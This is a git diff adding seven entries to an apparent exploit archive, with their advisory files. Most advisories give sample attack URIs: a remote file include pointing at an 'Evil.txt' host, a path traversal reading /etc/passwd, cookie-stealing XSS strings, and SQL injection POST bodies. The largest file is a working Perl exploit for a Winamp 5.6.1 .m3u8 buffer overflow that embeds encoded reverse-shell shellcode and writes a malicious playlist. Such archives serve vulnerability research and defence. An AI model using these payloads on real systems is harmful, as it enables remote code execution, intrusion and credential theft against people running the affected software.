diff --git a/files.csv b/files.csv index edd271cd5..638316117 100755 --- a/files.csv +++ b/files.csv @@ -32060,3 +32060,10 @@ id,file,description,date,author,platform,type,port 35602,platforms/php/webapps/35602.txt,"Etki Video PRO 2.0 kategori.asp cat Parameter SQL Injection",2011-04-11,Kurd-Team,php,webapps,0 35603,platforms/php/webapps/35603.txt,"Live Wire 2.3.1 For Wordpress Multiple Security Vulnerabilities",2011-04-11,MustLive,php,webapps,0 35604,platforms/php/webapps/35604.txt,"eForum 1.1 '/eforum.php' Arbitrary File Upload Vulnerability",2011-04-09,QSecure,php,webapps,0 +35606,platforms/linux/remote/35606.txt,"MIT Kerberos 5 kadmind Change Password Feature Remote Code Execution Vulnerability",2011-04-11,"Felipe Ortega",linux,remote,0 +35607,platforms/php/webapps/35607.txt,"Spellchecker Plugin 3.1 for WordPress 'general.php' Local and Remote File Include Vulnerabilities",2011-04-12,"Dr Trojan",php,webapps,0 +35608,platforms/php/webapps/35608.txt,"The Gazette Edition 2.9.4 For Wordpress Multiple Security Vulnerabilities",2011-04-12,MustLive,php,webapps,0 +35609,platforms/php/webapps/35609.txt,"WebCalendar 1.2.3 Multiple Cross Site Scripting Vulnerabilities",2011-04-12,"High-Tech Bridge SA",php,webapps,0 +35610,platforms/php/webapps/35610.txt,"Plogger 1.0 Rc1 'gallery_name' Parameter Cross Site Scripting Vulnerability",2011-04-12,"High-Tech Bridge SA",php,webapps,0 +35611,platforms/php/webapps/35611.txt,"Website Baker 2.8.1 Multiple SQL Injection Vulnerabilities",2011-04-12,"High-Tech Bridge SA",php,webapps,0 +35612,platforms/windows/remote/35612.pl,"Winamp 5.6.1 '.m3u8' File Remote Buffer Overflow Vulnerability",2011-04-12,KedAns-Dz,windows,remote,0 diff --git a/platforms/linux/remote/35606.txt b/platforms/linux/remote/35606.txt new file mode 100755 index 000000000..f348f50de --- /dev/null +++ b/platforms/linux/remote/35606.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/47310/info + +MIT Kerberos is prone to a remote code-execution vulnerability in 'kadmind'. + +An attacker may exploit this issue to execute arbitrary code with superuser privileges. Failed attempts will cause the affected application to crash, denying service to legitimate users. A successful exploit will completely compromise affected computers. + +MIT Kerberos 5 1.7 and later are vulnerable. + +NOTE (April 13, 2011): This BID was originally titled 'MIT Kerberos kadmind Version String Processing Remote Denial Of Service Vulnerability', but has been renamed to better reflect the nature of the issue. + +# nmap -n -sV krb01 \ No newline at end of file diff --git a/platforms/php/webapps/35607.txt b/platforms/php/webapps/35607.txt new file mode 100755 index 000000000..b5cf9c8af --- /dev/null +++ b/platforms/php/webapps/35607.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/47317/info + +The Spellchecker plugin for WordPress is prone to a local file-include vulnerability and a remote file-include vulnerability because the application fails to sufficiently sanitize user-supplied input. + +Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process or obtain potentially sensitive information. This may result in a compromise of the application and the underlying system; other attacks are also possible. + +Spellchecker 3.1 is vulnerable; other versions may also be affected. + +The following example URIs are available: + +http://www.example.com/general.php?file=http://sitename.com/Evil.txt? + +http://www.example.com/general.php?file=../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/35608.txt b/platforms/php/webapps/35608.txt new file mode 100755 index 000000000..df203b746 --- /dev/null +++ b/platforms/php/webapps/35608.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/47320/info + +The Gazette Edition for Wordpress is prone to multiple security vulnerabilities. These vulnerabilities include multiple denial-of-service vulnerabilities, a cross-site scripting vulnerability, and an information-disclosure vulnerability. + +Exploiting these issues could allow an attacker to deny service to legitimate users, gain access to sensitive information, execute arbitrary script code, or steal cookie-based authentication credentials. Other attacks may also be possible. + +Gazette Edition for Wordpress 2.9.4 and prior versions are vulnerable. + +http://www.example.com/wp-content/themes/gazette/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E + +http://www.example.com/wp-content/themes/gazette/thumb.php?src=http://site + +http://www.example.com/wp-content/themes/gazette/thumb.php?src=http://site/big_file&h=1&w=1 \ No newline at end of file diff --git a/platforms/php/webapps/35609.txt b/platforms/php/webapps/35609.txt new file mode 100755 index 000000000..faa3d0c41 --- /dev/null +++ b/platforms/php/webapps/35609.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/47328/info + +WebCalendar is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +WebCalendar 1.2.3 is vulnerable; other versions may also be affected. + +http://www.example.com/login.php?last_login=123%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E +http://www.example.com/colors.php?color="><%73cript>alert(document.cookie); \ No newline at end of file diff --git a/platforms/php/webapps/35610.txt b/platforms/php/webapps/35610.txt new file mode 100755 index 000000000..cbb1a880a --- /dev/null +++ b/platforms/php/webapps/35610.txt @@ -0,0 +1,21 @@ +source: http://www.securityfocus.com/bid/47329/info + +Plogger is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Plogger 1.0 Rc1 is vulnerable; other versions may also be affected. + +
+ + + + + + + + +
+ \ No newline at end of file diff --git a/platforms/php/webapps/35611.txt b/platforms/php/webapps/35611.txt new file mode 100755 index 000000000..72cdaa3d5 --- /dev/null +++ b/platforms/php/webapps/35611.txt @@ -0,0 +1,16 @@ +source: http://www.securityfocus.com/bid/47332/info + +Website Baker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. + +A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. + +Website Baker 2.8.1 is vulnerable; other versions may also be affected. + +POST /admin/users/add.php HTTP/1.1 + +user_id=&username_fieldname=username_1hnuvyv2&username_1hnuvyv2=test&password=password&password2=password&display_name=test&email=test%40test.com&home_folder=123'SQL_CODE&groups%5B%5D=123'SQL_CODE&active%5B%5D=1&submit=Add + + +POST /admin/groups/add.php HTTP/1.1 + +advanced=no&group_id=&group_name=123%27SQL_CODE_HERE&module_permissions%5B%5D=code&module_permissions%5B%5D=form&module_permissions%5B%5D=menu_link&module_permissions%5B%5D=news&module_permissions%5B%5D=wrapper&module_permissions%5B%5D=wysiwyg&template_permissions%5B%5D=allcss&template_permissions%5B%5D=argos_theme&template_permissions%5B%5D=blank&template_permissions%5B%5D=classic_theme&template_permissions%5B%5D=round&template_permissions%5B%5D=simple&template_permissions%5B%5D=wb_theme&submit=Add \ No newline at end of file diff --git a/platforms/windows/remote/35612.pl b/platforms/windows/remote/35612.pl new file mode 100755 index 000000000..fb203b1c8 --- /dev/null +++ b/platforms/windows/remote/35612.pl @@ -0,0 +1,109 @@ +source: http://www.securityfocus.com/bid/47333/info + +Winamp is prone to a remote buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. + +Attackers can execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. + +Winamp 5.6.1 is vulnerable; other versions may also be affected. + +#!/usr/bin/perl + +### +# Title : Winamp 5.6.1 (.m3u8) Stack Buffer Overflow +# Author : KedAns-Dz +# E-mail : ked-h@hotmail.com || ked-h@exploit-id.com +# Home : HMD/AM (30008/04300) - Algeria -(00213555248701) +# Twitter page : twitter.com/kedans +# platform : windows +# Impact : Stack Overflow +# Tested on : Windows XP sp3 FR +### +# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all ) +## +# [»] ~ special thanks to : jos_ali_joe (exploit-id.com) , and All exploit-id Team +### + +my $header = "#EXTM3U\n"; +my $junk = "\x41" x 16240; # Buffer Junk +my $eip = "\xad\x86\x0e\x07"; # overwrite EIP - 070E86AD | FFD4 CALL ESP nde.dll +my $seh = pack('V',0x10017928); # add ESP,4404 +$seh = $seh.pack('V',0x00000003); # Value de : EAX +$seh = $seh."\x41" x 11; +$seh = $seh.pack('V',0x41414141); # Value de : ECX +$seh = $seh."\x41" x 3; +$seh = $seh.pack('V',0x007EA478); # Value de : EDX +$seh = $seh."\x41" x 22; +$seh = $seh.pack('V',0x40000001); # Value de : EBX +$seh = $seh."\x41" x 8; +$seh = $seh.pack('V',0x028F1DB0); # Valeu de : ESP +$seh = $seh."\x41" x 12; +$seh = $seh.pack('V',0x77230459); # Valeu de : EBP +$seh = $seh."\x41" x 10; +$seh = $seh.pack('V',0x08FD62A8); # Valeu de : ESI +$seh = $seh."\x41" x 11; +$seh = $seh.pack('V',0x00497300); # Valeu de : EDI +$seh = $seh."\x41" x 2; +$seh = $seh.pack('V',0x08FD293C); # Valeu de : EIP +$seh = $seh."\x41" x 5; +my $nops = "\x90" x 100; # Nop +my $space = "\x41" x (43492 - length($junk) - length($nops)); +my $shellcode = # windows/shell_reverse_tcp (http://www.metasploit.com) +"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48" . +"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41" . +"\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58" . +"\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30" . +"\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" . +"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41" . +"\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42" . +"\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4d" . +"\x38\x4e\x69\x47\x70\x43\x30\x45\x50\x45\x30\x4d\x59\x4a" . +"\x45\x45\x61\x48\x52\x43\x54\x4e\x6b\x50\x52\x50\x30\x4c" . +"\x4b\x51\x42\x46\x6c\x4e\x6b\x46\x32\x46\x74\x4c\x4b\x50" . +"\x72\x46\x48\x46\x6f\x4f\x47\x43\x7a\x51\x36\x46\x51\x49" . +"\x6f\x46\x51\x4f\x30\x4e\x4c\x47\x4c\x43\x51\x43\x4c\x43" . +"\x32\x44\x6c\x47\x50\x4f\x31\x48\x4f\x46\x6d\x43\x31\x49" . +"\x57\x48\x62\x4c\x30\x51\x42\x42\x77\x4c\x4b\x50\x52\x42" . +"\x30\x4c\x4b\x43\x72\x45\x6c\x46\x61\x4a\x70\x4c\x4b\x43" . +"\x70\x43\x48\x4e\x65\x4b\x70\x42\x54\x50\x4a\x45\x51\x48" . +"\x50\x46\x30\x4e\x6b\x50\x48\x45\x48\x4e\x6b\x51\x48\x51" . +"\x30\x45\x51\x48\x53\x48\x63\x47\x4c\x43\x79\x4e\x6b\x47" . +"\x44\x4e\x6b\x46\x61\x4b\x66\x50\x31\x4b\x4f\x44\x71\x4f" . +"\x30\x4e\x4c\x49\x51\x4a\x6f\x46\x6d\x46\x61\x4f\x37\x46" . +"\x58\x4d\x30\x42\x55\x4a\x54\x46\x63\x43\x4d\x4c\x38\x47" . +"\x4b\x51\x6d\x44\x64\x44\x35\x49\x72\x43\x68\x4c\x4b\x50" . +"\x58\x45\x74\x47\x71\x48\x53\x51\x76\x4e\x6b\x46\x6c\x42" . +"\x6b\x4c\x4b\x42\x78\x47\x6c\x45\x51\x48\x53\x4e\x6b\x45" . +"\x54\x4c\x4b\x47\x71\x48\x50\x4f\x79\x42\x64\x44\x64\x47" . +"\x54\x51\x4b\x51\x4b\x43\x51\x50\x59\x43\x6a\x46\x31\x4b" . +"\x4f\x4d\x30\x50\x58\x43\x6f\x43\x6a\x4c\x4b\x45\x42\x48" . +"\x6b\x4e\x66\x43\x6d\x42\x48\x50\x33\x44\x72\x45\x50\x43" . +"\x30\x51\x78\x42\x57\x42\x53\x46\x52\x43\x6f\x50\x54\x43" . +"\x58\x42\x6c\x44\x37\x44\x66\x45\x57\x49\x6f\x48\x55\x48" . +"\x38\x4c\x50\x47\x71\x45\x50\x47\x70\x47\x59\x4b\x74\x51" . +"\x44\x42\x70\x42\x48\x44\x69\x4d\x50\x42\x4b\x43\x30\x49" . +"\x6f\x48\x55\x50\x50\x42\x70\x50\x50\x42\x70\x47\x30\x42" . +"\x70\x43\x70\x50\x50\x43\x58\x48\x6a\x44\x4f\x49\x4f\x4d" . +"\x30\x49\x6f\x4b\x65\x4e\x69\x48\x47\x42\x48\x43\x4f\x45" . +"\x50\x43\x30\x47\x71\x43\x58\x43\x32\x45\x50\x44\x51\x43" . +"\x6c\x4e\x69\x4a\x46\x51\x7a\x42\x30\x51\x46\x43\x67\x42" . +"\x48\x4d\x49\x4e\x45\x51\x64\x51\x71\x49\x6f\x4e\x35\x50" . +"\x68\x42\x43\x42\x4d\x42\x44\x47\x70\x4c\x49\x48\x63\x51" . +"\x47\x51\x47\x51\x47\x50\x31\x4b\x46\x51\x7a\x47\x62\x51" . +"\x49\x50\x56\x4d\x32\x49\x6d\x50\x66\x4f\x37\x42\x64\x46" . +"\x44\x45\x6c\x47\x71\x43\x31\x4c\x4d\x50\x44\x51\x34\x42" . +"\x30\x4a\x66\x43\x30\x43\x74\x50\x54\x42\x70\x43\x66\x43" . +"\x66\x51\x46\x47\x36\x46\x36\x42\x6e\x50\x56\x46\x36\x42" . +"\x73\x43\x66\x50\x68\x44\x39\x48\x4c\x47\x4f\x4b\x36\x4b" . +"\x4f\x48\x55\x4c\x49\x4b\x50\x50\x4e\x42\x76\x43\x76\x49" . +"\x6f\x50\x30\x42\x48\x43\x38\x4c\x47\x47\x6d\x43\x50\x49" . +"\x6f\x4e\x35\x4f\x4b\x4a\x50\x4d\x65\x4d\x72\x51\x46\x51" . +"\x78\x4d\x76\x4e\x75\x4f\x4d\x4d\x4d\x4b\x4f\x48\x55\x47" . +"\x4c\x46\x66\x43\x4c\x45\x5a\x4b\x30\x49\x6b\x49\x70\x43" . +"\x45\x45\x55\x4d\x6b\x51\x57\x44\x53\x43\x42\x42\x4f\x51" . +"\x7a\x47\x70\x46\x33\x4b\x4f\x49\x45\x41\x41"; +my $end = "\x90" x (20000 - $nops); # Nop sled +open(FILE,'>>KedAns.m3u8'); +print FILE $header.$junk.$space.$seh.$nops.$eip.$shellcode.$end; +close(FILE); + +